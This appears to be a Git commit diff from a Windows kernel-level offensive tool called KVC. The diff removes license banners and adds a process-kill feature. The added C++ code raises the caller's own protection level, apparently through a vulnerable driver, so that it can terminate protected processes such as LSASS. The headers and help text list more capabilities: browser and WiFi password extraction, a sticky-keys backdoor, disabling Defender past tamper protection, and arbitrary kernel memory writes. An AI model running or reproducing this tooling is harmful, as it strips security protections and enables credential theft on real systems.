admin/kvc
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Aktualizacja: 2025-09-23 01:38:42

Browse Source
This commit is contained in:
wesmar
2025-09-23 01:38:42 +02:00
parent 3392584676
commit ecd1dca043
32 changed files with 537 additions and 624 deletions
Download Patch File Download Diff File Expand all files Collapse all files

27
kvc/BrowserOrchestrator.cpp
View File

@@ -1,29 +1,4 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
// BrowserOrchestrator.cpp
// BrowserOrchestrator.cpp
#include <Windows.h>
#include <Rpc.h>
#include <iostream>

33
kvc/Controller.h
View File

@@ -10,10 +10,10 @@
class ReportExporter;
// Core kernel process structures
// Core kernel process structures for EPROCESS manipulation
struct ProcessEntry
{
ULONG_PTR KernelAddress; // EPROCESS structure address
ULONG_PTR KernelAddress; // EPROCESS structure address in kernel space
DWORD Pid; // Process identifier
UCHAR ProtectionLevel; // PP/PPL/None protection level
UCHAR SignerType; // Digital signature authority
@@ -43,7 +43,7 @@ struct SQLiteAPI
int (*close_v2)(void*) = nullptr;
};
// Password extraction result structure
// Password extraction result structure for DPAPI operations
struct PasswordResult
{
std::wstring type; // Chrome, Edge, WiFi credential type
@@ -104,6 +104,19 @@ public:
bool UnprotectAllProcesses() noexcept;
bool UnprotectMultipleProcesses(const std::vector<std::wstring>& targets) noexcept;
// Process termination with driver support
bool KillProcess(DWORD pid) noexcept;
bool KillProcessByName(const std::wstring& processName) noexcept;
// Kernel process access for external operations (ProcessManager)
std::optional<ULONG_PTR> GetProcessKernelAddress(DWORD pid) noexcept;
std::optional<UCHAR> GetProcessProtection(ULONG_PTR kernelAddress) noexcept;
std::vector<ProcessEntry> GetProcessList() noexcept;
// Self-protection operations for privilege escalation
bool SelfProtect(const std::wstring& protectionLevel, const std::wstring& signerType) noexcept;
std::optional<ProcessMatch> ResolveNameWithoutDriver(const std::wstring& processName) noexcept;
// DPAPI password extraction with TrustedInstaller
bool ShowPasswords(const std::wstring& outputPath) noexcept;
bool ExportBrowserData(const std::wstring& outputPath, const std::wstring& browserType) noexcept;
@@ -142,10 +155,6 @@ public:
bool StartDriverServiceSilent() noexcept;
std::vector<BYTE> ExtractEncryptedDriver() noexcept;
std::vector<BYTE> DecryptDriver(const std::vector<BYTE>& encryptedData) noexcept;
// Self-protection operations
bool SelfProtect(const std::wstring& protectionLevel, const std::wstring& signerType) noexcept;
std::optional<ProcessMatch> ResolveNameWithoutDriver(const std::wstring& processName) noexcept;
// Sticky keys backdoor management
bool InstallStickyKeysBackdoor() noexcept;
@@ -162,7 +171,7 @@ private:
bool EnablePrivilege(LPCWSTR privilegeName) noexcept;
bool EnableDebugPrivilege() noexcept;
// Enhanced file writing with TrustedInstaller privileges
// Enhanced file writing with TrustedInstaller privileges
bool WriteFileWithPrivileges(const std::wstring& filePath, const std::vector<BYTE>& data) noexcept;
// PE splitting with enhanced validation
@@ -172,7 +181,7 @@ private:
// Atomic driver operations for stability
bool ForceRemoveService() noexcept;
bool EnsureDriverAvailable() noexcept;
bool EnsureDriverAvailable() noexcept;
bool IsDriverCurrentlyLoaded() noexcept;
bool PerformAtomicInit() noexcept;
bool PerformAtomicInitWithErrorCleanup() noexcept;
@@ -181,11 +190,8 @@ private:
bool InstallDriverSilently() noexcept;
bool RegisterDriverServiceSilent(const std::wstring& driverPath) noexcept;
// Kernel process management
// Internal kernel process management (implementation details)
std::optional<ULONG_PTR> GetInitialSystemProcessAddress() noexcept;
std::optional<ULONG_PTR> GetProcessKernelAddress(DWORD pid) noexcept;
std::vector<ProcessEntry> GetProcessList() noexcept;
std::optional<UCHAR> GetProcessProtection(ULONG_PTR addr) noexcept;
bool SetProcessProtection(ULONG_PTR addr, UCHAR protection) noexcept;
// Process pattern matching with regex support
@@ -234,5 +240,4 @@ private:
// Emergency cleanup for atomic operations
bool PerformAtomicCleanup() noexcept;
};

25
kvc/ControllerBinaryManager.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
// ControllerBinaryManager.cpp - Fixed compilation issues
#include "Controller.h"
#include "common.h"

25
kvc/ControllerCore.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
// ControllerCore.cpp
#include "Controller.h"
#include "common.h"

25
kvc/ControllerDriverManager.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
// ControllerDriverManager.cpp
#include "Controller.h"
#include "common.h"

25
kvc/ControllerDriverManager_.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
// ControllerDriverManager.cpp
#include "Controller.h"
#include "common.h"

25
kvc/ControllerEventLogOperations.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
#include "Controller.h"
#include "common.h"

25
kvc/ControllerMemoryOperations.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
// ControllerMemoryOperations.cpp
#include "Controller.h"
#include "common.h"

25
kvc/ControllerPasswordManager.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
#include "Controller.h"
#include "ReportExporter.h"
#include "common.h"

204
kvc/ControllerProcessOperations.cpp
View File

@@ -1,28 +1,4 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
// ControllerProcessOperations.cpp
#include "Controller.h"
#include "common.h"
#include "Utils.h"
@@ -33,6 +9,179 @@ that define these protections.
extern volatile bool g_interrupted;
// Process termination with protection elevation and fallback mechanisms
bool Controller::KillProcess(DWORD pid) noexcept
{
// Try to get kernel address first - if driver already initialized, reuse it
auto kernelAddr = GetProcessKernelAddress(pid);
bool needsCleanup = false;
// Only initialize driver if not already loaded AND we couldn't get kernel address
if (!kernelAddr && !IsDriverCurrentlyLoaded()) {
if (!PerformAtomicInitWithErrorCleanup()) {
return false;
}
needsCleanup = true;
// Try again after driver initialization
kernelAddr = GetProcessKernelAddress(pid);
}
// If we still can't get kernel address, try direct termination without protection elevation
if (!kernelAddr) {
INFO(L"Could not get kernel address for target process, proceeding without self-protection");
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, pid);
if (!hProcess) {
DWORD error = GetLastError();
ERROR(L"Failed to open process for termination (error: %d)", error);
if (needsCleanup) PerformAtomicCleanup();
return false;
}
BOOL terminated = TerminateProcess(hProcess, 1);
DWORD error = GetLastError();
CloseHandle(hProcess);
if (terminated) {
SUCCESS(L"Successfully terminated PID: %d (direct method)", pid);
if (needsCleanup) PerformAtomicCleanup();
return true;
} else {
ERROR(L"Failed to terminate process directly (error: %d)", error);
if (needsCleanup) PerformAtomicCleanup();
return false;
}
}
// Get target process protection level for elevation
auto targetProtection = GetProcessProtection(kernelAddr.value());
if (targetProtection && targetProtection.value() > 0) {
UCHAR targetLevel = Utils::GetProtectionLevel(targetProtection.value());
UCHAR targetSigner = Utils::GetSignerType(targetProtection.value());
std::wstring levelStr = (targetLevel == static_cast<UCHAR>(PS_PROTECTED_TYPE::Protected)) ?
L"PP" : L"PPL";
INFO(L"Target process has %s-%s protection, elevating current process",
levelStr.c_str(),
Utils::GetSignerTypeAsString(targetSigner));
// Elevate current process protection to match or exceed target
UCHAR currentProcessProtection = Utils::GetProtection(targetLevel, targetSigner);
if (!SetCurrentProcessProtection(currentProcessProtection)) {
ERROR(L"Failed to elevate current process protection");
// Continue anyway - might still work
}
}
// Attempt standard process termination
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, pid);
if (!hProcess) {
DWORD error = GetLastError();
ERROR(L"Failed to open process for termination (error: %d)", error);
// Try with more privileges if available
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (!hProcess) {
ERROR(L"Failed to open process with extended privileges (error: %d)", GetLastError());
if (needsCleanup) PerformAtomicCleanup();
return false;
}
}
BOOL terminated = TerminateProcess(hProcess, 1);
DWORD terminationError = GetLastError();
CloseHandle(hProcess);
if (terminated) {
SUCCESS(L"Successfully terminated PID: %d", pid);
if (needsCleanup) PerformAtomicCleanup();
return true;
} else {
ERROR(L"Failed to terminate PID: %d (error: %d)", pid, terminationError);
if (needsCleanup) PerformAtomicCleanup();
return false;
}
}
// Optimized batch process termination with shared driver state
bool Controller::KillProcessByName(const std::wstring& processName) noexcept
{
if (!PerformAtomicInitWithErrorCleanup()) {
return false;
}
auto matches = FindProcessesByName(processName);
if (matches.empty()) {
ERROR(L"No process found matching pattern: %s", processName.c_str());
PerformAtomicCleanup();
return false;
}
DWORD successCount = 0;
DWORD totalCount = static_cast<DWORD>(matches.size());
INFO(L"Found %d processes matching '%s'", totalCount, processName.c_str());
for (const auto& match : matches) {
INFO(L"Attempting to terminate process: %s (PID %d)",
match.ProcessName.c_str(), match.Pid);
// Use direct kernel address since we already have it from FindProcessesByName
auto targetProtection = GetProcessProtection(match.KernelAddress);
if (targetProtection && targetProtection.value() > 0) {
UCHAR targetLevel = Utils::GetProtectionLevel(targetProtection.value());
UCHAR targetSigner = Utils::GetSignerType(targetProtection.value());
std::wstring levelStr = (targetLevel == static_cast<UCHAR>(PS_PROTECTED_TYPE::Protected)) ?
L"PP" : L"PPL";
INFO(L"Target process has %s-%s protection, elevating current process",
levelStr.c_str(),
Utils::GetSignerTypeAsString(targetSigner));
// Elevate current process protection to match or exceed target
UCHAR currentProcessProtection = Utils::GetProtection(targetLevel, targetSigner);
if (!SetCurrentProcessProtection(currentProcessProtection)) {
ERROR(L"Failed to elevate current process protection");
// Continue anyway - might still work
}
}
// Attempt termination with fallback approach
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, match.Pid);
if (!hProcess) {
DWORD error = GetLastError();
INFO(L"Failed to open with PROCESS_TERMINATE (error: %d), trying PROCESS_ALL_ACCESS", error);
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, match.Pid);
if (!hProcess) {
ERROR(L"Failed to open process with any privileges (error: %d)", GetLastError());
continue;
}
}
BOOL terminated = TerminateProcess(hProcess, 1);
DWORD terminationError = GetLastError();
CloseHandle(hProcess);
if (terminated) {
SUCCESS(L"Successfully terminated: %s (PID %d)",
match.ProcessName.c_str(), match.Pid);
successCount++;
} else {
ERROR(L"Failed to terminate PID: %d (error: %d)", match.Pid, terminationError);
}
}
INFO(L"Kill operation completed: %d/%d processes terminated", successCount, totalCount);
PerformAtomicCleanup();
return successCount > 0;
}
// Kernel process operations with interruption handling
std::optional<ULONG_PTR> Controller::GetInitialSystemProcessAddress() noexcept {
auto kernelBase = Utils::GetKernelBaseAddress();
@@ -52,7 +201,7 @@ std::optional<ULONG_PTR> Controller::GetProcessKernelAddress(DWORD pid) noexcept
return entry.KernelAddress;
}
ERROR(L"Failed to find kernel address for PID %d", pid);
INFO(L"Kernel address not available for PID %d, initializing driver...", pid);
return std::nullopt;
}
@@ -443,7 +592,8 @@ bool Controller::ListProtectedProcesses() noexcept {
}
// Process protection manipulation with atomic operations
bool Controller::UnprotectProcess(DWORD pid) noexcept {
bool Controller::UnprotectProcess(DWORD pid) noexcept
{
if (!PerformAtomicInitWithErrorCleanup()) {
return false;
}

25
kvc/ControllerSystemIntegration.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
// ControllerSystemIntegration.cpp
#include "Controller.h"
#include "common.h"

25
kvc/DefenderManager.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
#include "DefenderManager.h"
#include <filesystem>
#include <algorithm>

45
kvc/HelpSystem.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
#include <windows.h>
#include "HelpSystem.h"
#include <iostream>
@@ -36,6 +11,7 @@ void HelpSystem::PrintUsage(std::wstring_view programName) noexcept
PrintServiceCommands();
PrintBasicCommands();
PrintProcessTerminationCommands();
PrintProtectionCommands();
PrintSystemCommands();
PrintBrowserCommands();
@@ -118,6 +94,17 @@ void HelpSystem::PrintBasicCommands() noexcept
std::wcout << L"\n";
}
void HelpSystem::PrintProcessTerminationCommands() noexcept
{
PrintSectionHeader(L"Process Termination Commands");
PrintCommandLine(L"kill <PID|process_name>", L"Terminate process with automatic protection elevation");
PrintCommandLine(L"kill <PID1,PID2,name3>", L"Terminate multiple processes (comma-separated)");
PrintNote(L"Supports process names: 'kill total' terminates Total Commander");
PrintNote(L"Automatically matches target protection level for protected processes");
PrintNote(L"Case-insensitive partial matching: 'notepad' matches 'notepad.exe'");
std::wcout << L"\n";
}
void HelpSystem::PrintProtectionCommands() noexcept
{
PrintSectionHeader(L"Process Protection Commands");
@@ -160,6 +147,7 @@ void HelpSystem::PrintSecurityEngineCommands() noexcept
PrintCommandLine(L"secengine enable", L"Enable Windows Defender security engine");
PrintCommandLine(L"secengine status", L"Check current security engine status");
PrintCommandLine(L"secengine disable --restart", L"Disable and restart system immediately");
PrintCommandLine(L"secengine enable --restart", L"Enable and restart system immediately");
PrintNote(L"Registry-level manipulation - bypasses tamper protection");
PrintNote(L"System restart required for changes to take effect");
std::wcout << L"\n";
@@ -311,6 +299,12 @@ void HelpSystem::PrintUsageExamples(std::wstring_view programName) noexcept
printLine(L"set 5678 PP Windows", L"Force set PP-Windows protection");
printLine(L"unprotect lsass", L"Remove protection from LSASS");
printLine(L"unprotect 1,2,3,lsass", L"Batch unprotect multiple targets");
// Process termination examples
printLine(L"kill 1234", L"Terminate process with PID 1234");
printLine(L"kill total", L"Terminate Total Commander by name");
printLine(L"kill 1234,5678,9012", L"Terminate multiple processes");
printLine(L"kill lsass", L"Terminate protected process (auto-elevation)");
// TrustedInstaller examples
printLine(L"trusted cmd", L"Run command as TrustedInstaller");
@@ -331,6 +325,7 @@ void HelpSystem::PrintUsageExamples(std::wstring_view programName) noexcept
printLine(L"secengine disable", L"Disable Windows Defender engine");
printLine(L"secengine enable", L"Re-enable Windows Defender engine");
printLine(L"secengine disable --restart", L"Disable Defender and restart system");
printLine(L"secengine enable --restart", L"Enable Defender and restart system");
// Data extraction examples
printLine(L"export secrets", L"Export secrets to Downloads folder");

1
kvc/HelpSystem.h
View File

@@ -18,6 +18,7 @@ public:
static void PrintBasicCommands() noexcept;
static void PrintProtectionCommands() noexcept;
static void PrintSystemCommands() noexcept;
static void PrintProcessTerminationCommands() noexcept;
static void PrintDefenderCommands() noexcept;
static void PrintDPAPICommands() noexcept;
static void PrintBrowserCommands() noexcept;

25
kvc/KeyboardHook.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
#include "KeyboardHook.h"
#include "TrustedInstallerIntegrator.h"
#include "common.h"

33
kvc/Kvc.cpp
View File

@@ -1,31 +1,7 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
#include "common.h"
#include "Controller.h"
#include "DefenderManager.h"
#include "ProcessManager.h"
#include "ServiceManager.h"
#include "HelpSystem.h"
#include <string_view>
@@ -393,6 +369,13 @@ int wmain(int argc, wchar_t* argv[])
return g_controller->DumpProcessByName(processName, outputPath) ? 0 : 2;
}
}
// Process termination via kernel driver with batch support
else if (command == L"kill")
{
ProcessManager::HandleKillCommand(argc, argv, g_controller.get());
return 0;
}
// Process information commands with color-coded protection status output
else if (command == L"list")

1
kvc/Kvc.vcxproj
View File

@@ -113,6 +113,7 @@
<ClCompile Include="ControllerSystemIntegration.cpp" />
<ClCompile Include="ControllerPasswordManager.cpp" />
<ClCompile Include="ControllerEventLogOperations.cpp" />
<ClCompile Include="ProcessManager.cpp" />
<ClCompile Include="OffsetFinder.cpp" />
<ClCompile Include="kvc.cpp" />
<ClCompile Include="kvcDrv.cpp" />

27
kvc/KvcDrv.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
// KvcDrv.cpp
#include "kvcDrv.h"
#include "common.h"
@@ -166,4 +141,4 @@ bool kvc::Write(ULONG_PTR address, DWORD valueSize, DWORD value) noexcept {
DWORD bytesReturned = 0;
return DeviceIoControl(m_deviceHandle.get(), RTC_IOCTL_MEMORY_WRITE,
&memoryWrite, sizeof(memoryWrite), &memoryWrite, sizeof(memoryWrite), &bytesReturned, nullptr);
}
}

2
kvc/KvcDrv.h
View File

@@ -54,7 +54,7 @@ public:
bool Write16(ULONG_PTR address, WORD value) noexcept;
bool Write32(ULONG_PTR address, DWORD value) noexcept;
bool Write64(ULONG_PTR address, DWORD64 value) noexcept;
private:
// Smart handle wrapper for automatic cleanup
struct HandleDeleter

25
kvc/OffsetFinder.cpp
View File

@@ -1,28 +1,3 @@
/*******************************************************************************
_ ____ ______
| |/ /\ \ / / ___|
| ' / \ \ / / |
| . \ \ V /| |___
|_|\_\ \_/ \____|
The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
of kernel-level primitives** for legitimate security research and penetration testing.
KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
that define these protections.
-----------------------------------------------------------------------------
Author : Marek Wesołowski
Email : marek@wesolowski.eu.org
Phone : +48 607 440 283 (Tel/WhatsApp)
Date : 04-09-2025
*******************************************************************************/
// OffsetFinder.cpp
#include "OffsetFinder.h"
